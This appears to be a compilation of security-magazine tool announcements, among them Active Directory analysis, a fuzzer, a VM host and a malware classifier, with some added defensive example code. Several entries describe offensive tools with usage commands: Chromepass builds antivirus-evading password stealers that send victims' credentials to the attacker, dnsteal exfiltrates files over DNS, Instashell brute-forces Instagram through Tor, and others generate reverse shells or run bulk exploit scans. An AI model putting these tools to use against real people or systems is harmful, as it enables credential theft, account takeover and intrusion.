The framework can generate a graph using the available information in the database and plot it via the web UI (nest). Furthermore, the graph generation and path calculations can be invoked programmatically, either by using the web API (/UI endpoint) or the graph object's functions.

Anomalies detection

The framework can identify common AD misconfigurations without graph generation. Currently only via the web API.

User

User anomalies detection involves the detection of insecure UAC permissions and extensive user description values. This feature set is expected to grow in the future as new features will be implemented.

Machine

Machine anomalies detection involves detection of insecure UAC permissions, non-mandatory SMB signing, outdated OS versions, and out-of-domain machines. This feature set is expected to grow in the future as new features are implemented.
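
The userAccountControl checks mentioned for users and machines can be reproduced outside the framework. The following is an added example, not Jackdaw's own code: a Python decoder for the well-known userAccountControl bit values, a table of the flags this example treats as insecure (that selection is the example's, not Jackdaw's), and a scan over constructed (sAMAccountName, userAccountControl) pairs that skips disabled accounts by default.

```python
# Well-known userAccountControl bit values from the Active Directory schema.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
}

# Flags this example treats as insecure, with the reason reported.
INSECURE = {
    "PASSWD_NOTREQD": "account may have an empty password",
    "ENCRYPTED_TEXT_PWD_ALLOWED": "password stored with reversible encryption",
    "DONT_EXPIRE_PASSWORD": "password never expires",
    "TRUSTED_FOR_DELEGATION": "unconstrained Kerberos delegation",
    "USE_DES_KEY_ONLY": "only DES Kerberos keys",
    "DONT_REQ_PREAUTH": "Kerberos pre-authentication not required",
}

# Constructed (sAMAccountName, userAccountControl) pairs, not from a real domain.
SAMPLE_ACCOUNTS = [
    ("alice", 0x200),          # NORMAL_ACCOUNT
    ("svc_backup", 0x10200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("legacy_app", 0x400200),  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    ("old_admin", 0x10202),    # ... | ACCOUNTDISABLE: disabled, so not reported
    ("WKS01$", 0x81000),       # WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
]


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_uac_anomalies(accounts, report_disabled=False):
    """Return [(sAMAccountName, [(flag, reason), ...])] for accounts that carry
    at least one insecure flag. Disabled accounts are skipped unless asked for."""
    findings = []
    for sam, uac in accounts:
        names = decode_uac(uac)
        if "ACCOUNTDISABLE" in names and not report_disabled:
            continue
        issues = [(n, INSECURE[n]) for n in names if n in INSECURE]
        if issues:
            findings.append((sam, issues))
    return findings


if __name__ == "__main__":
    for sam, issues in find_uac_anomalies(SAMPLE_ACCOUNTS):
        for flag, why in issues:
            print("%-12s %-28s %s" % (sam, flag, why))
```

The same decoder works on the userAccountControl column of an LDAP export or of Jackdaw's own user and machine tables; the only domain-specific part is which flags your organisation considers acceptable on service accounts.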

Password cracking

The framework does not perform any cracking; it only organizes the hashes and the cracking results. The current focus is on impacket's and aiosmb's DCSync results, and on NT and LM hashes only!

Sample process is the following:

  1. Harvesting credentials as a text file via impacket/aiosmb or as memory dumps of the LSASS process via whatever tool you see fit.
  2. Upload the harvested credentials via the API
  3. Poll uncracked hashes via the API
  4. Crack them (hashcat?)
  5. Upload the results to the framework via the API
  6. Generate a report on the cracked/uncracked users and password strength and password sharing

Note from the author: This feature was implemented for both attackers and defenders. Personally I don't see much added value on either side, since at the point one obtained the NT hash of a user it's just as good as the password... Nonetheless, more and more companies are performing password strength exercises, and this feature would help them. As for attackers: it is just showing off at this point, but be my guest. Maybe scare management for extra points.
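
Steps 2 to 6 of the process above boil down to joining a user:hash list with a hash:plaintext result set. The following is an added example, not Jackdaw's code: a Python implementation of that join over constructed records (placeholder 32-character hex strings stand in for NT hashes, and a hashcat-style potfile of hash:plaintext lines stands in for the cracking results) that reports which users were cracked, which users share a password (identical NT hash), and which cracked passwords fall under a length threshold.

```python
from collections import defaultdict

# Placeholder 32-hex-character strings standing in for NT hashes (constructed,
# not real hashes). Three users share H1.
H1, H2, H3 = "a" * 31 + "1", "b" * 31 + "2", "c" * 31 + "3"

# Constructed user:hash records in the shape a DCSync dump is reduced to.
SAMPLE_HASHES = [
    ("alice", H1),
    ("bob", H2),
    ("carol", H1),
    ("svc_sql", H3),
    ("dave", H1),
]

# Constructed cracking results, hash:plaintext per line as in a hashcat potfile.
SAMPLE_POTFILE = "%s:Summer2020\n%s:correct horse battery staple\n" % (H1, H3)


def parse_potfile(text):
    """Map lower-case hash -> plaintext; plaintexts may themselves contain ':'."""
    cracked = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        h, pw = line.split(":", 1)
        cracked[h.strip().lower()] = pw
    return cracked


def password_report(records, cracked, min_len=12):
    """Join user:hash records with cracking results and summarise exposure."""
    by_hash = defaultdict(list)
    for user, h in records:
        by_hash[h.lower()].append(user)
    shared = {h: users for h, users in by_hash.items() if len(users) > 1}
    weak = {h: by_hash[h] for h, pw in cracked.items()
            if h in by_hash and len(pw) < min_len}
    cracked_users = sorted(u for h, users in by_hash.items() if h in cracked for u in users)
    return {
        "total_users": len(records),
        "cracked_users": cracked_users,
        "shared": shared,          # hash -> users with an identical NT hash
        "weak": weak,              # hash -> users whose cracked password is short
    }


if __name__ == "__main__":
    rep = password_report(SAMPLE_HASHES, parse_potfile(SAMPLE_POTFILE))
    print("%d/%d users cracked" % (len(rep["cracked_users"]), rep["total_users"]))
    for h, users in rep["shared"].items():
        print("shared password among:", ", ".join(users))
    for h, users in rep["weak"].items():
        print("short password for:", ", ".join(users))
```

Shared hashes are reportable without any cracking at all, since NT hashes are unsalted and identical passwords produce identical hashes; that is the part of the report with the best value for the effort, and it is why the plaintexts themselves never need to leave the cracking host.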

Important

This project is in the experimental phase! This means multiple things:

  1. it may crash
  2. the controls you are using might change in the future (most likely)
  3. (the worst part) The database design is not necessarily suitable for future requests so it may change. There will be no effort to maintain backward compatibility with the experimental-phase DB structure!

Technical part of Jackdaw

Database backend

Jackdaw uses SQLAlchemy ORM module, which gives you the option to use any SQL DB backend you like. The tests are mainly done on SQLite for obvious reasons. There will be no backend-specific commands used in this project that would limit you.

Building the UI

THIS IS ONLY NEEDED IF YOU INSTALL VIA GIT AND/OR CHANGE SOMETHING IN THE UI CODE.

The UI was written in React. Before the first use/installation, you have to build it. For this, you will need nodejs and npm installed. Then:

  1. Go to jackdaw/nest/site/nui
  2. Run npm install
  3. Run npm run build

Once done with the above, the UI is ready to play with.

Kudos

"If I have seen further it is by standing on the shoulders of Giants."

For the original idea

BloodHound team

For the ACL edge calculation

@dirkjanm (https://github.com/dirkjanm/)

For the awesome UI

Zsolt Imre (https://github.com/keymandll)

For the data collection parts

please see kudos section in aiosmb and msldap modules

In case I forgot to mention someone, please send a PR.


More about Jackdaw: https://github.com/skelsec/jackdaw


dnsteal - DNS Exfiltration tool for stealthily sending files over DNS requests


This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Below are a couple of images showing examples of multiple-file transfer and single verbose file transfer. Features:

  • Support for multiple files
  • Gzip compression supported
  • Now supports the customization of subdomains and bytes per subdomain and the length of filename

See help below:

If you do not understand the help, then just use the program with default options!

python dnsteal.py 127.0.0.1 -z -v

This one sends 45 bytes per subdomain, with 4 subdomains in each query and 15 bytes reserved for the filename at the end.

python dnsteal.py 127.0.0.1 -z -v -b 45 -s 4 -f 15

This one leaves no space for the filename.

python dnsteal.py 127.0.0.1 -z -v -b 63 -s 4 -f 0
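As an added defender-side example (not part of dnsteal or the original post), the following Python scores DNS query log lines for the shape the -b/-s/-f layout above produces: several long, high-entropy labels in front of the base domain. The log line format, the thresholds and the sample queries are constructed assumptions.

```python
"""Flag DNS queries shaped like file exfiltration over subdomains (added example)."""
import hashlib
import math
from collections import Counter, defaultdict

# Thresholds are assumptions tuned to the defaults discussed above:
# a data-carrying query has several labels close to the 63-byte limit.
MIN_DATA_LABELS = 3     # number of long labels needed to flag a query
MIN_LABEL_LEN = 30      # "long" label: well above typical hostnames
MIN_ENTROPY = 3.0       # bits/char; hex-encoded data sits near 3.9, words lower
MIN_QNAME_LEN = 100     # total query name length


def shannon_entropy(text):
    """Shannon entropy in bits per character of a string."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log_line(line):
    """Parse a constructed 'timestamp client qname' log line."""
    ts, client, qname = line.split()
    return ts, client, qname.rstrip('.').lower()


def score_query(qname, base_label_count=2):
    """Measure the labels in front of the base domain (e.g. example.com)."""
    labels = qname.split('.')
    data_labels = labels[:-base_label_count] if len(labels) > base_label_count else []
    long_labels = [label for label in data_labels if len(label) >= MIN_LABEL_LEN]
    return {
        'qname_len': len(qname),
        'long_labels': len(long_labels),
        'entropy': shannon_entropy(''.join(data_labels)),
    }


def is_suspicious(qname):
    """All three indicators must fire: length, label count and entropy."""
    s = score_query(qname)
    return (s['qname_len'] >= MIN_QNAME_LEN
            and s['long_labels'] >= MIN_DATA_LABELS
            and s['entropy'] >= MIN_ENTROPY)


def detect(lines):
    """Return {client: [suspicious qnames]} over an iterable of log lines."""
    hits = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        _, client, qname = parse_log_line(line)
        if is_suspicious(qname):
            hits[client].append(qname)
    return dict(hits)


def _fake_payload_label(seed, size):
    """Deterministic hex label standing in for encoded file bytes (constructed)."""
    return hashlib.sha256(seed.encode()).hexdigest()[:size]


# Constructed sample: four 45-byte labels plus a 15-byte filename label, the
# layout of '-b 45 -s 4 -f 15', mixed with benign lookups of the same domain.
EXFIL_QNAME = ('.'.join(_fake_payload_label(f'chunk{i}', 45) for i in range(4))
               + '.' + _fake_payload_label('name', 15) + '.example.com')
SAMPLE_LOG = [
    '2020-04-01T10:00:00Z 10.0.0.5 www.example.com.',
    '2020-04-01T10:00:01Z 10.0.0.5 mail.example.com.',
    f'2020-04-01T10:00:02Z 10.0.0.7 {EXFIL_QNAME}.',
    '2020-04-01T10:00:03Z 10.0.0.7 cdn.static-assets.example.com.',
]

if __name__ == '__main__':
    for client, qnames in detect(SAMPLE_LOG).items():
        print(client, len(qnames), 'suspicious queries')
```

In production the per-client count of flagged queries over a time window is the useful signal, since a single odd lookup is common but a stream of them is not.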

More at: https://github.com/m57/dnsteal

The post dnsteal - DNS Exfiltration tool for stealthily sending files over DNS requests appeared first on Hakin9 - IT Security Magazine.

Frida API Fuzzer - experimental fuzzer meant to be used for API in-memory fuzzing.


This experimental fuzzer is meant to be used for API in-memory fuzzing.

The design is highly inspired and based on AFL/AFL++.

At the moment the mutator is quite simple: just AFL's havoc and splice stages.

I tested only the examples under tests/. This is a WIP project, but it is known to work at least on GNU/Linux x86_64 and Android x86_64.

You need Frida >= 12.8.1 to run this (pip3 install -U frida) and frida-tools to compile the harness.

Usage

The fuzz library has to be imported into a custom harness and then compiled with frida-compile to generate the agent that frida-fuzzer will inject into the target app.

The majority of the logic of the fuzzer is in the agent.

A harness has the following format:

var fuzz = require("./fuzz");

var TARGET_MODULE = "test_linux64";
var TARGET_FUNCTION = DebugSymbol.fromName("target_func").address;
var RET_TYPE = "void";
var ARGS_TYPES = ['pointer', 'int'];

var func_handle = new NativeFunction(TARGET_FUNCTION, RET_TYPE, ARGS_TYPES, { traps: 'all' });

fuzz.target_module = TARGET_MODULE;

var payload_mem = Memory.alloc(fuzz.config.MAX_FILE);

fuzz.fuzzer_test_one_input = function (/* Uint8Array */ payload) {

  Memory.writeByteArray(payload_mem, payload, payload.length);

  func_handle(payload_mem, payload.length);

}

fuzz.fuzzer_test_one_input is mandatory. If you don't specify fuzz.target_module, all the code executed will be instrumented.

You can also set fuzz.manual_loop_start = true to tell the fuzzer that you will call fuzz.fuzzing_loop() in a callback and so it must not call it for you (e.g. to start fuzzing when a button is clicked in the Android app).

The callback fuzz.init_callback can be set to execute code when the fuzzer is ready to begin. See tests/test_java.js for an example.

fuzz.dictionary is a classic fuzzer dictionary, an array to which you can add items (accepted types are Array, ArrayBuffer, Uint8Array, String) that are used as additional values in the mutator. See tests/test_libxml2.js for an example.

frida-fuzzer accepts the following arguments:

-i FOLDER Folder with initial seeds
-o FOLDER Output folder with intermediate seeds and crashes
-U Connect to USB
-spawn Spawn and attach instead of simply attach
-script SCRIPT Script filename (default is fuzzer-agent.js)

If you don't specify the output folder, a temp folder is created under /tmp. If you don't specify the folder with the initial seeds, an uninformed seed 0000 is used as the starting seed.

If you are fuzzing a local application, you may want to execute system-config before frida-fuzzer to tune the parameters of your system and speed things up.

Running ./frida-fuzzer -spawn ./tests/test_linux64 you will see something like the following status screen on your terminal:

You can also easily add a custom stage in fuzz/fuzzer.js and add it to the stages list in fuzz/index.js.

To customize the fuzzer, edit fuzz/config.js. The variables that you may want to change are MAP_SIZE (If the code that you are fuzzing is small you can reduce it and gain a bit of speed), MAX_FILE (the maximum size of generated input) and QUEUE_CACHE_MAX_SIZE (increase the queue cache size for more speed, especially on Android).

Example

Let's fuzz the native shared library in the example Android app in tests.

Make sure you have root on your virtual device:

host$ adb root

Download the Android x86_64 frida-server from the repo release page and copy it on the device under /data/local/tmp (use adb push).

Start a shell and run the frida-server:

device# cd /data/local/tmp
device# ./frida-server

Now install the test app tests/app-debug.apk using the drag & drop into the emulator window.

Then, open the app.

Compile the agent script with Frida-compile:

host$ frida-compile -x tests/test_ndk_x64.js -o fuzzer-agent.js

Open the app in the emulator.

Fuzz the test_func function of the libnative-lib.so library shipped with the test app with the command:

host$ ./frida-fuzzer -U -o output_folder/ com.example.ndktest1

Interesting test cases and crashes are both saved into output_folder.

Enjoy.

TODO

Hey OSS community, there are a lot of TODOs if someone wants to contribute.

  • Java code fuzzing (waiting for additional exposed methods in frida-java-bridge, should be easy, almost done)
  • splice stage (merge two test cases in the queue and apply havoc to the result)
  • support dictionaries (and so modify also havoc)
  • seed selection
  • inlined instrumentation for arm64
  • performance scoring (explore schedule of AFL)
  • structural mutator (mutate bytes based on a grammar written in JSON)
  • CompareCoverage (sub-instruction profiling to bypass fuzzing roadblocks)
  • rewrite frida-fuzzer in C with frida-core to be able to run all stuff on the mobile device

If you have doubts about one of these features, feel free to DM me on Twitter.

For features proposals, there is the Issues section.


More: https://github.com/andreafioraldi/frida-fuzzer

The post Frida API Fuzzer - experimental fuzzer meant to be used for API in-memory fuzzing. appeared first on Hakin9 - IT Security Magazine.

PastebinScrapy - Flask application for scraping latest scrapes from Pastebin


This is a Web Scraping application built on Flask. This web application utilizes Pastebin Scraping API and scrapes IOCs including IP addresses, domains, hashes, and emails from the latest pastes of Pastebin. It uses Elasticsearch as the database to store the pastes and Kibana is used for visualizing data from Elasticsearch.

Prerequisites

  • Python
  • Flask
  • Requests
  • Elasticsearch 5.6
  • BeautifulSoup
  • Kibana

Usage

  • Enter your Pastebin Scraping API key and Flask secret key in the code
  • Run the PastebinScrapy.py file
  • Open 127.0.0.1:5000 in any browser
  • Open 127.0.0.1:5601 in any browser to see the Kibana dashboard



More: https://github.com/apurvsinghgautam/PastebinScrapy

The post PastebinScrapy - Flask application for scraping latest scrapes from Pastebin appeared first on Hakin9 - IT Security Magazine.

LogonSessions for Incident Response [FREE COURSE CONTENT]


In this tutorial from our Security Incident Response course you will see how to use the LogonSessions tool from Windows Sysinternals in incident response. Want to add something to your toolbox? Let's dive in! 



Participants will be able to clearly define a security incident and know the proper way to handle it. The participants will also be able to define the steps needed to lead the incident to a desired outcome throughout the process of investigation.

You will find out how to:

  • Detect, identify, and mitigate threats
  • Assess potential security risks
  • Account for human error
  • Create an Incident Response Plan
  • Identify High Value Targets
  • Set up Incident Response tooling
  • Create IoCs and implement them
  • Recover systems, data and connectivity
  • Return to production state
  • Document the incident

Example tools used in the course:

  • Windows built-in tools;
  • Windows Sysinternals suite (pslist; psexec – relation output; autoruns – how to use and how it is useful in incident response; listdlls; procexp/procexp64; tcpview; LogonSessions);
  • Volatility;
  • dd/windd;
  • Logparser;
  • grep and Windows Event Log Explorer

In module 1, we will study:

  • Assessing potential security risks
  • Accounting for human error
  • Creating Incident Response Plan
  • Identifying High Value Targets
  • Identifying Stakeholders
  • Setting up Incident Response tooling
  • System instrumentation
  • Employee security training

Module 1 exercises:

Familiarizing with Windows Sysinternals suite (pslist; psexec – relation output; autoruns – how to use and how it is useful in incident response; listdlls; procexp/procexp64; tcpview; logonsessions) and Windows Event Log analysis

Check out other modules here! 



The post LogonSessions for Incident Response [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.


Project iKy - Tool That Collects Information From An Email


Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

Python stuff and Celery

You must install the libraries inside requirements.txt

python3 -m pip install -r requirements.txt

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the frontend directory, install the dependencies

cd frontend
npm install

Wake up iKy Tool

Turn on Backend

Redis

Turn on the server in a terminal

redis-server

Python stuff and Celery

Turn on Celery in another terminal, from within the backend directory

./celery.sh

In yet another terminal, start the backend app from the backend directory

python3 app.py

Turn on Frontend

Finally, to run the frontend server, execute the following command from the frontend directory

npm start

Screen after turning on iKy

Demo:


Wiki Page: https://gitlab.com/kennbroorg/iKy/-/wikis/home

More: https://gitlab.com/kennbroorg/iKy

The post Project iKy - Tool That Collects Information From An Email appeared first on Hakin9 - IT Security Magazine.

Chromepass - Hacking Chrome Saved Passwords


Chromepass is a python-based console application that generates Windows executable with the following features:

  • Decrypt Chrome saved passwords
  • Send a file with the login/password combinations remotely (email or reverse-HTTP)
  • Custom icon
  • Completely undetectable by AntiVirus Engines

AV Detection!

Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed using a variety of websites:

  • VirusTotal Scan (0/68) 30-09-2019
    • this is an educational project, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal
  • AntiScan (0/26) 24-09-2019
  • Hybrid Analysis All Clean (CrowdStrike Falcon, MetaDefender and VirusTotal) 24-09-2019

Getting started

Dependencies and Requirements

This is a very simple application, which uses only:

  • Python - Only tested on 3.7.4 but should work in 3.6+

Installation

Chromepass requires Python 3.6+ to run.

Install the dependencies:

> cd chromepass
> pip install -r requirements.txt

If any errors occur, make sure you're running in the proper environment (if applicable) and that you have Python 3.6+ (preferably 3.7.4). If the errors persist, try:

> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt

Usage

Chromepass is very straightforward. Start by running:

> python create_server.py

It will ask you to select between two options:

  • (1) via email [To be fixed]
    • This will ask you for an email address and a password
    • It will then ask you if you wish to send to another address or to yourself
    • Next, you're asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable after the passwords have been transferred.
    • You can then write your own message or leave it blank
    • You're done! Wait for the executable to be generated and then it's ready.
  • (2) via client.exe [Recommended at the moment]
    • First, you're asked to input an IP Address for a reverse connection. This is the address that belongs to the attacker. It can be a local IP address or a remote IP Address. If a remote address is chosen, Port Forwarding needs to be in place.
    • You're then asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable after the passwords have been transferred.
    • You can then write your own message or leave it blank
    • You're done! Wait for the executables to be generated and then it's ready.
    • The client.exe must be started before the server_ip.exe. The server_ip.exe is the file the victim receives.
  • Note: To set a custom icon, replace icon.ico by the desired icon with the same name and format.

Todo

  • Sending Real-time precise location of the victim (completed, releases next update)
  • Also steal Firefox passwords (Completed, releases next update)
  • The option of installing a backdoor allowing remote control of the victim's computer (completed, releases next update)
  • Support for more email providers (in progress)
  • Also steal passwords from other programs, such as keychains (in progress)
  • Add Night Mode (in progress)

Errors, Bugs, and feature requests

If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.

Please follow the templates shown when creating the issue.

Learn More

For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking

If you wish to contact me, you can do so via: marionascimento@itsec.us

Disclaimer

I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.


More: https://github.com/darkarp/chromepass

The post Chromepass - Hacking Chrome Saved Passwords appeared first on Hakin9 - IT Security Magazine.

Tentacle - A POC Vulnerability Verification And Exploit Framework


Tentacle is a POC vulnerability verification and exploit framework. It supports the free extension of exploits and uses POC scripts. It supports calls to zoomeye, fofa, shodan, and other APIs to perform bulk vulnerability verification for multiple targets. (Still in DEV...)

Install

pip3 install -r requestment.txt

Usage

When you run it for the first time, the configuration file conf/tentacle.conf will be generated automatically.

# Show help for tentacle.
python3 tentacle.py --help

# Show all modules; you can see them in the `script` path.
python3 tentacle.py --show

# Show all functions of a module with -f show or -f help
python3 tentacle.py -m script/web/web_status -f show
python3 tentacle.py -m script/web/web_status -f help

# Load target by iS/iN/iF/iT/iX/iE/gg/sd/ze/ff.
# Scan port and then it will try to send the poc.
python3 tentacle.py -m script/web/web_status -iS www.examples.com             # Load target by url or host 
python3 tentacle.py -m script/web/web_status -iN 192.168.111.0/24             # Load target by network
python3 tentacle.py -m script/web/web_status -iF target.txt                   # Load target by file
python3 tentacle.py -m script/web/web_status -iT dcc54c3e1cc2c2e1             # Load target by a record's target
python3 tentacle.py -m script/web/web_status -iX nmap_xml.xml                 # Load target by nmap.xml
python3 tentacle.py -m script/web/web_status -iE "powered by discuz"          # Load target by baidu/bing/360so
python3 tentacle.py -m script/web/web_status -gg 'intext:powered by discuz'   # Load target by google api
python3 tentacle.py -m script/web/web_status -sd 'apache'                     # Load target by shodan api
python3 tentacle.py -m script/web/web_status -ze 'app:weblogic'               # Load target by zoomeye api
python3 tentacle.py -m script/web/web_status -ff 'domain="example.com"'       # Load target by fofa api

# Load modules by -m (e.g. script/info/web_status,@web)
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status                    # Load web_status module
python3 tentacle.py -iS 127.0.0.1 -m @web                                     # Load all module of web path
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status,@web               # Load all module of web path and web_status module
python3 tentacle.py -iS 127.0.0.1 -m "*"                                      # Load all module of script path

# Set port scan scope
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status                    # Scan top 150 ports and then perform bulk vulnerability verification for multiple targets.
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status -sP                # Skip port scan and then it will try the default port number server
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status -lP 80-90,443      # Scan 80-90 ports and 443 port and then perform bulk vulnerability verification for multiple targets.

# Use a function of a module by -m and -f (e.g. -m web_status -f prove); make sure the function exists in the module.
python3 tentacle.py -m script/web/web_status -f prove

# Show task's result by -tS 
python3 tentacle.py -tS 8d4b37597aaec25e

# Export task's result by -tS to test.xlsx
python3 tentacle.py -tS 8d4b37597aaec25e  -o test

# Update by git
python3 tentacle.py --update

Update

  • [2018-11-15] Code refactoring and bug fixes.
  • [2019-06-08] Code refactoring and add port scan.
  • [2020-03-15] Code refactoring and add the script.

Thanks

  1. Sqlmap
  2. POC-T

More: https://github.com/orleven/Tentacle

The post Tentacle - A POC Vulnerability Verification And Exploit Framework appeared first on Hakin9 - IT Security Magazine.

Instashell - Multi-threaded Instagram Brute Forcer without password limit


Instashell is a Shell Script to perform a multi-threaded brute force attack against Instagram. This script can bypass login limiting and can test an infinite number of passwords at a rate of +400 passwords/min using 20 threads.

Legal disclaimer:

Usage of InstaShell for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Features

  • Multi-thread (400 pass/min, 20 threads)
  • Save/Resume sessions
  • Anonymous attack through TOR
  • Check valid usernames
  • Default password list (best +39k 8 letters)
  • Check and Install all dependencies

Usage:

git clone https://github.com/thelinuxchoice/instashell
cd instashell
chmod +x instashell.sh
service tor start
sudo ./instashell.sh

Install requirements (Curl, Tor, Openssl):

chmod +x install.sh
sudo ./install.sh

How does it work?

The script uses an Android ApkSignature to perform authentication; in addition, it uses TOR and rotates the IP address to avoid blocking. The script uses the Instagram-py algorithm, see the project at: https://github.com/antony-jr/instagram-py

Author: github.com/thelinuxchoice

IG: instagram.com/thelinuxchoice

Don't copy this code without giving me the credits, nerd!


Donate!

Support the authors:

Donate using Liberapay


More: https://github.com/thelinuxchoice/instashell

Tool developer: github.com/thelinuxchoice

The post Instashell - Multi-threaded Instagram Brute Forcer without password limit appeared first on Hakin9 - IT Security Magazine.

Print-My-Shell: Python script wrote to automate the process of generating various reverse shells.


"Print My Shell" is a Python script written to automate the process of generating various reverse shells based on the PayloadsAllTheThings and Pentestmonkey reverse shell cheat sheets.

Using this script you can easily generate various types of reverse shells without leaving your command line. This script will come in handy when you are playing CTF-like challenges.

Available Shell Types

  • Bash
  • Perl
  • Ruby
  • Golang
  • Netcat
  • Ncat
  • Powershell
  • Awk
  • Lua
  • Java
  • Socat
  • Nodejs
  • Telnet
  • Python

Git Installation

# clone the repo
$ git clone https://github.com/sameera-madushan/Print-My-Shell.git

# change the working directory to Print-My-Shell
$ cd Print-My-Shell

Usage

usage: shell.py [-h] [-i IPADDR] [-p PORTNUM] [-t TYPE] [-l] [-a]

optional arguments:
  -h, --help            show this help message and exit
  -i IPADDR, --ip IPADDR
                        IP address
  -p PORTNUM, --port PORTNUM
                        Port number
  -t TYPE, --type TYPE  Type of the reverse shell to generate
  -l, --list            List all available shell types
  -a, --all             Generate all the shells

Support & Contributions

  • Please ⭐ this repository if this project helped you!
  • Contributions of any kind welcome!

References

Payloads All The Things Reverse Shell Cheat Sheet

Pentestmonkey Reverse Shell Cheat Sheet


More: https://github.com/sameera-madushan/Print-My-Shell

The post Print-My-Shell: Python script wrote to automate the process of generating various reverse shells. appeared first on Hakin9 - IT Security Magazine.

UTM - a full featured virtual machine host for iOS.


UTM is a full-featured virtual machine host for iOS. In short, it allows you to run Windows, Android, and more on your iPhone and iPad. More information at https://getutm.app/

Features

  • 30+ processors supported including x86_64, ARM64, and RISC-V thanks to qemu as a backend
  • Fast native graphics through para-virtualization thanks to SPICE
  • JIT based acceleration using qemu TCG
  • Frontend designed from scratch for iOS 11+ using the latest and greatest APIs
  • Create, manage, run VMs directly from your device
  • No jailbreak required!

Install

If you just want to use UTM, this is not the right place! Visit https://getutm.app/install/ for directions.

Building

Make sure you have cloned with submodules: git submodule update --init --recursive.

Easy

The recommended way to obtain the dependencies is to use the built artifacts from Github Actions. Look for the latest build and download the Sysroot artifact from either the arm64 build (for iOS) or x86_64 build (for iOS Simulator). Then unzip the artifact to the root directory of UTM. You can then open UTM.xcodeproj, select your signing certificate, and then run UTM from Xcode.

Advanced

If you want to build the dependencies yourself, it is highly recommended that you start with a fresh macOS VM. This is because some of the dependencies attempt to use /usr/local/lib even though the architecture does not match. Certain installed libraries like libusb and gawk will break the build.

  1. Install the Xcode command line tools and the following build prerequisites: brew install bison pkg-config gettext glib libgpg-error nasm. Make sure to add bison to your $PATH environment!
  2. git submodule update --init --recursive if you haven't already
  3. Run ./scripts/build_dependencies.sh to start the build. If building for the simulator, run ./scripts/build_dependencies.sh -a x86_64 instead.
  4. Open UTM.xcodeproj and select your signing certificate
  5. Build and deploy from Xcode

Signing

If you build with Xcode, signing should be done automatically. iOS 13.3.1 is NOT supported due to a signing bug. You can use any version lower or higher than 13.3.1.

Signing Release

The ipa releases are fake-signed. If you are jailbroken, you should NOT sign it. You can install it directly with Filza.

If you want to sign the release for stock devices, there are a variety of ways. The recommended way is with iOS App Signer. Note there are known issues with many "cloud" signing services such as AppCake and they do not work with UTM. If you get a crash while trying to launch a VM, then your signing certificate was invalid.

In more technical detail, there are two kinds of signing certificates: "development" and "distribution". UTM requires "development" which has the get-task-allow entitlement.

Signing Development Build

If you want to sign an xcarchive such as from a Github Actions built artifact, you can use the following command:

./scripts/resign.sh UTM.xcarchive outputPath PROFILE_NAME TEAM_ID

Where PROFILE_NAME is the name of the provisioning profile and TEAM_ID is the identifier next to the team name in the provisioning profile. Make sure the signing key is imported into your keychain and the provisioning profile is installed on your iOS device.

If you have a jailbroken device, you can also fake-sign it (with ldid installed):

./scripts/resign.sh UTM.xcarchive outputPath

Why isn't this in the AppStore?

Apple does not permit any apps that have interpreted or generated code, therefore it is unlikely that UTM will ever be allowed. However, there are various ways people on the internet have come up with to sideload apps without requiring a jailbreak. We do not condone or support any of these methods.

License

UTM is distributed under the permissive Apache 2.0 license. However, it uses several (L)GPL components. Most are dynamically linked but the gstreamer plugins are statically linked and parts of the code are taken from qemu. Please be aware of this if you intend on redistributing this application.


More:

https://github.com/utmapp/UTM

https://getutm.app/

The post UTM - a full featured virtual machine host for iOS. appeared first on Hakin9 - IT Security Magazine.

Inhale - A malware analysis and classification tool.


Inhale is a malware analysis and classification tool that is capable of automating and scaling many static analysis operations. This is the beta release version, for testing purposes, feedback, and community development.

Background

Inhale started as a series of small scripts that I used when collecting and analyzing a large amount of malware from diverse sources. There are plenty of frameworks and tools for doing similar work, but none of them really matched my workflow of quickly finding, classifying, and storing information about a large number of files. Some also require expensive API keys and other services that cost money.

I ended up turning these scripts into something that people can quickly set up and use, whether you run from a research server, a laptop, or a low-cost computer like a Raspberry Pi.

Install

This tool is built to run on Linux using Python3, ElasticSearch, radare2, yara and binwalk. jq is also needed to pretty print output from the database. Here are some of the basic instructions to install.

Python3

Install requirements

python3 -m pip install -r requirements.txt

Installing ElasticSearch (Debian)

Documentation

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
